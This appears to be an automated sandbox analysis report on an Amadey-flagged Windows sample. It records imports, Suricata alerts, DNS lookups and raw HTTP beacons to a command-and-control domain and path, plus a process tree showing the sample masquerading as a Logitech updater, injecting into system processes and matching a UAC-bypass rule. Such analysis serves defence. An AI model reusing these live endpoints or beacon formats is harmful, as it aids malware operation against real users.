ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, CloseClipboard, DestroyCursor, PostQuitMessage, ShowScrollBar, EnableMenuItem, HideCaret, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | GetErrorInfo, SysFreeString, VariantClear, VariantInit, SysReAllocStringLen, SafeArrayCreate, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, VariantChangeType, VariantCopyInd
advapi32.dll | RegFlushKey, RegQueryValueExW, RegCloseKey, RegOpenKeyExW
netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll | memcpy, memset
kernel32.dll | SetFileAttributesW, GetFileType, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, GetLongPathNameW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, FileTimeToDosDateTime, ReadFile, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetFileAttributesExW, ExpandEnvironmentStringsW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetTempFileNameW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, GetModuleFileNameA, GlobalHandle, lstrlenW, CompareStringA, SetEndOfFile, QueryPerformanceCounter, lstrcpyW, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, EnumResourceNamesW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll | RevokeDragDrop, CreateBindCtx, CoCreateGuid, CoCreateInstance, CoUninitialize, ReleaseStgMedium, RegisterDragDrop, IsEqualGUID, OleInitialize, CLSIDFromProgID, OleUninitialize, CoInitializeEx, CoInitialize, CoTaskMemFree, CoTaskMemAlloc
gdi32.dll | EnumEnhMetaFile, Pie, SetPaletteEntries, SetBkMode, CreateCompatibleBitmap, BeginPath, GetEnhMetaFileHeader, CloseEnhMetaFile, RectVisible, AngleArc, CloseFigure, SetICMMode, StrokeAndFillPath, ResizePalette, SetAbortProc, SetTextColor, GetTextColor, StretchBlt, GetGlyphIndicesW, RoundRect, SelectClipRgn, ExtEscape, RestoreDC, SetRectRgn, GetFontLanguageInfo, FillPath, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, SetPixelV, CreatePalette, GetCharWidth32W, CreateDCW, CreateICW, PolyBezierTo, GetStockObject, CreateSolidBrush, GetBkMode, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, GetSystemPaletteEntries, GetEnhMetaFileBits, CreatePenIndirect, GetEnhMetaFilePaletteEntries, SetMapMode, CreateFontIndirectW, PolyBezier, EndDoc, GetObjectW, GetFontData, GetCurrentObject, GetCharWidthW, GetWinMetaFileBits, SetROP2, GetOutlineTextMetricsW, GetEnhMetaFileDescriptionW, ArcTo, GetKerningPairs, EnumFontFamiliesExA, CreateEnhMetaFileW, Arc, SelectPalette, SetGraphicsMode, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, EndPath, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, GetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetGlyphIndicesA, GetDIBColorTable, GetGlyphOutlineW, CreateBrushIndirect, PatBlt, StrokePath, SetEnhMetaFileBits, Rectangle, DeleteDC, SaveDC, BitBlt, SetWorldTransform, FrameRgn, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, CombineTransform, CreateBitmap, CombineRgn, SetWinMetaFileBits, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, SetStretchBltMode, GetDIBits, ExtCreateRegion, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, CreateRoundRectRgn, GetTextExtentPointW, GetOutlineTextMetricsA, ExtTextOutW, SetBrushOrgEx, GetPixel, GetTextFaceW, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x4bcfb0
__dbk_fcall_wrapper | 2 | 0x410c54
dbkFCallWrapperAddr | 1 | 0x9ff63c
Language of compilation system | Country where language is spoken | Map
English | United States
English | Australia
English | Southern Africa
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-25T22:43:37.141787+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.4 | 49838 | 188.114.97.3 | 80 | TCP
2024-10-25T22:43:38.925555+0200 | 2856148 | ETPRO MALWARE Amadey CnC Activity M4 | 1 | 192.168.2.4 | 49838 | 188.114.97.3 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 22:43:36.020263910 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:43:36.025679111 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:43:36.025753975 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:43:36.025903940 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:43:36.031367064 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:43:37.140635014 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:43:37.141787052 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:43:37.141901016 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:43:37.141974926 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:43:38.645340919 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:43:38.650702000 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:43:38.925343990 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:43:38.925554991 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:45:25.971975088 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Oct 25, 2024 22:45:25.979310036 CEST | 80 | 49838 | 188.114.97.3 | 192.168.2.4
Oct 25, 2024 22:45:25.979415894 CEST | 49838 | 80 | 192.168.2.4 | 188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 22:43:36.002202034 CEST | 65030 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 22:43:36.002669096 CEST | 58143 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 22:43:36.005321980 CEST | 53158 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 22:43:36.011610985 CEST | 53 | 65030 | 1.1.1.1 | 192.168.2.4
Oct 25, 2024 22:43:36.013505936 CEST | 53 | 53158 | 1.1.1.1 | 192.168.2.4
Oct 25, 2024 22:43:36.014693022 CEST | 53 | 58143 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 22:43:36.002202034 CEST | 192.168.2.4 | 1.1.1.1 | 0xb8c6 | Standard query (0) | artvisions-autoinsider3.com | A (IP address) | IN (0x0001) | false
Oct 25, 2024 22:43:36.002669096 CEST | 192.168.2.4 | 1.1.1.1 | 0x8f97 | Standard query (0) | artvisions-autoinsider.com | A (IP address) | IN (0x0001) | false
Oct 25, 2024 22:43:36.005321980 CEST | 192.168.2.4 | 1.1.1.1 | 0x42a6 | Standard query (0) | artvisions-autoinsider2.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 25, 2024 22:43:36.011610985 CEST | 1.1.1.1 | 192.168.2.4 | 0xb8c6 | Name error (3) | artvisions-autoinsider3.com | none | none | A (IP address) | IN (0x0001) | false
Oct 25, 2024 22:43:36.013505936 CEST | 1.1.1.1 | 192.168.2.4 | 0x42a6 | Name error (3) | artvisions-autoinsider2.com | none | none | A (IP address) | IN (0x0001) | false
Oct 25, 2024 22:43:36.014693022 CEST | 1.1.1.1 | 192.168.2.4 | 0x8f97 | No error (0) | artvisions-autoinsider.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 22:43:36.014693022 CEST | 1.1.1.1 | 192.168.2.4 | 0x8f97 | No error (0) | artvisions-autoinsider.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
• artvisions-autoinsider.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49838 | 188.114.97.3 | 80 | 4348 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 22:43:36.025903940 CEST | 171 | OUT | POST /8bkjdSdfjCe/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: artvisions-autoinsider.com
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Oct 25, 2024 22:43:37.140635014 CEST | 774 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 20:43:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr0czzqNre%2FuWKD3PcvNF2W2oPvKFD8UvsaHZ1BdV7SkgApICq5o931UI9aA8pS8ACBM64z7PYPuhcwmikzlSeIt2Gvvg2UJPpV8vZnQ9HfEKzgLFlyNUbFvnJWmiPYCXnPQmxITRKduPEvrVg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d850a318a9d2d33-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=171&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Oct 25, 2024 22:43:37.141901016 CEST | 774 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 20:43:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dr0czzqNre%2FuWKD3PcvNF2W2oPvKFD8UvsaHZ1BdV7SkgApICq5o931UI9aA8pS8ACBM64z7PYPuhcwmikzlSeIt2Gvvg2UJPpV8vZnQ9HfEKzgLFlyNUbFvnJWmiPYCXnPQmxITRKduPEvrVg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d850a318a9d2d33-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=171&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0
Oct 25, 2024 22:43:38.645340919 CEST | 323 | OUT | POST /8bkjdSdfjCe/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: artvisions-autoinsider.com
Content-Length: 154
Cache-Control: no-cache
Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 39 43 45 34 34 41 44 31 33 43 31 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 46 44 44 43 37 31 30 35 39 37 32 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 38
Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A76659CE44AD13C1D58C48CF8B295278F7EBCB075A9634FFDDC7105972FEA7596F64579EC8B2482ABAE6C811856F005AE078E55178
Oct 25, 2024 22:43:38.925343990 CEST | 796 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 20:43:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sUNYaYlWfEY0T4RmgnbK8a63463p65ez9G7Sj%2B6D3s8ZoxRrcUMZkbKnekk7oT%2FFR8sGEudyMe7oM521xjpwJIEuLKpA%2BrLET6RnDqTnmT0XzihLHAtXUYU8Pz03uWcrXpDFaYS0swwcE%2F%2B7YA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d850a3ee8552d33-DFW
server-timing: cfL4;desc="?proto=TCP&rtt=1388&sent=4&recv=6&lost=0&retrans=0&sent_bytes=774&recv_bytes=494&delivery_rate=1991746&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0
                                                                                                      Target ID:0
                                                                                                      Start time:16:42:24
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5 hash:FF827141856089465CEC7AFDC9E65F9D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1730888199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000002.2156540910.000000000394F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:16:42:26
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\more.com
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\more.com
                                                                                                      Imagebase:0xe30000
                                                                                                      File size:24'576 bytes
                                                                                                      MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:16:42:26
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:7
                                                                                                      Start time:16:43:18
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      Imagebase:0x400000
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5 hash:FF827141856089465CEC7AFDC9E65F9D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:16:43:21
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5 hash:FF827141856089465CEC7AFDC9E65F9D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:16:43:22
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\more.com
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\more.com
                                                                                                      Imagebase:0xe30000
                                                                                                      File size:24'576 bytes
                                                                                                      MD5 hash:03805AE7E8CBC07840108F5C80CF4973
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:16:43:22
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:14
                                                                                                      Start time:16:43:25
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0xa20000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      Target ID:16
                                                                                                      Start time:16:44:17
                                                                                                      Start date:25/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                      Imagebase:0xa20000
                                                                                                      File size:4'514'184 bytes
                                                                                                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:32.8%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:5.4%
                                                                                                        Total number of Nodes:147
                                                                                                        Total number of Limit Nodes:7
                                                                                                        execution_graph: [graph node/edge data elided; nodes are code addresses in 0x798000-0x79B000; API calls referenced by the graph: GlobalAlloc, GetPEB, LoadLibraryW, NtQuerySystemInformation, CreateFileW, ReadFile, CloseHandle, WriteFile, VirtualProtect, malloc]

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph: [graph node/edge data elided; 109 function nodes (Function_007982C6 through Function_0079D4C7) with their call edges]

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph: [basic-block graph elided; function spanning 799962-799acd with a loop around 799977-7999d9 that calls 799902 and 799372/NtQuerySystemInformation, and an inner block at 799a6b-799a97 calling 799732 and 798fb2]
                                                                                                        APIs
                                                                                                          • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,00040000,00040000), ref: 007999C6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocGlobalInformationQuerySystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 3737350999-0
                                                                                                        • Opcode ID: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                        • Instruction ID: 17be851d84b3f7a5c65864a0c895b1990679072fa59c6b656abe613cab6b1359
                                                                                                        • Opcode Fuzzy Hash: af0b5cb85ebff21ad004f17c148dcb155806cd6198d72419ed993a28eb2c6b99
                                                                                                        • Instruction Fuzzy Hash: 4451EA75D00109EFDF04CF99D881AAEB7B5FF98300F14855DEA15AB341D739AA81CBA1

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 00799264
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                        • Instruction ID: c6b77d4765c7e81c40f338dd798c5b803052c3c1a569cdf75fd2d2e5f22701c5
                                                                                                        • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                        • Instruction Fuzzy Hash: 6631AC75A00108FFDF44DF98D891F9EB7B9AF88310F208198EA19AB391D675AE41DB50

                                                                                                        Control-flow Graph

control_flow_graph (edge dump joined from two lines and collapsed): function 0x79a082-0x79acd9, basic blocks 13-208. The entry block (0x79a082-0x79a5a2) calls 0x799ad2, 0x799032 (x2), 0x799902 (x2, the GlobalAlloc wrapper), 0x798e72 (x2, the LoadLibraryW wrapper), 0x798ef2 (29 calls in all), 0x798b52, 0x798ae2 and finally 0x799962, the NtQuerySystemInformation routine above. Later blocks call 0x798bd2, 0x799242, 0x799b62, 0x7996c2, 0x799d12, 0x798ce2, 0x7991f2, 0x7984d2, 0x799192, 0x798de2, 0x7993f2, 0x7997e2, 0x79a052, 0x798c22, 0x798fb2, 0x7989e2, 0x7982d2, 0x7989f2, 0x798a02, 0x798622, 0x798eb2 and 0x799e42. Block 147 (0x79ab50-0x79accc) holds the two VirtualProtect calls (0x79ac57 and 0x79ac8a), each preceded by a call to 0x7991f2, after further calls to 0x799902 and 0x798e72. Exit via block 144 (0x79acd6-0x79acd9).
                                                                                                        APIs
                                                                                                          • Part of subcall function 00799902: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 00799932
                                                                                                          • Part of subcall function 00798E72: LoadLibraryW.KERNELBASE(?), ref: 00798EA3
                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 0079AC57
                                                                                                        • VirtualProtect.KERNELBASE(?,00000000,00000000,00000000), ref: 0079AC8A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2154540126.0000000000798000.00000020.00000001.01000000.00000003.sdmp, Offset: 00798000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_798000_5Z1WFRMTOXRH6X21Z8NU8.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$AllocGlobalLibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 2510009449-0
                                                                                                        • Opcode ID: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                        • Instruction ID: 1bf1e792e26c291694053c6d5d3df2dec411f76455052249a06058b48134e11d
                                                                                                        • Opcode Fuzzy Hash: 240aa55989c54137efdc20a0ee1ae1ca480df6d3202c4e1da627c4bf8a4fd026
                                                                                                        • Instruction Fuzzy Hash: 8492D5B5E00218EFCB54DF98D991EAEB7B5BF88300F248199E509A7341E735AE41CF91

                                                                                                        Control-flow Graph

control_flow_graph (edge dump collapsed): function 0x799832-0x7998a9, basic blocks 209-214. Block 209 (0x799832-0x79985d) calls CreateFileW and branches either to 210 (0x79985f-0x799861), which goes straight to the exit 212 (0x7998a6-0x7998a9), or to 211 (0x799863-0x799886), which calls WriteFile and continues through 213 (0x799898-0x7998a4) or 214 (0x799888-0x799896) to the same exit.
                                                                                                        APIs
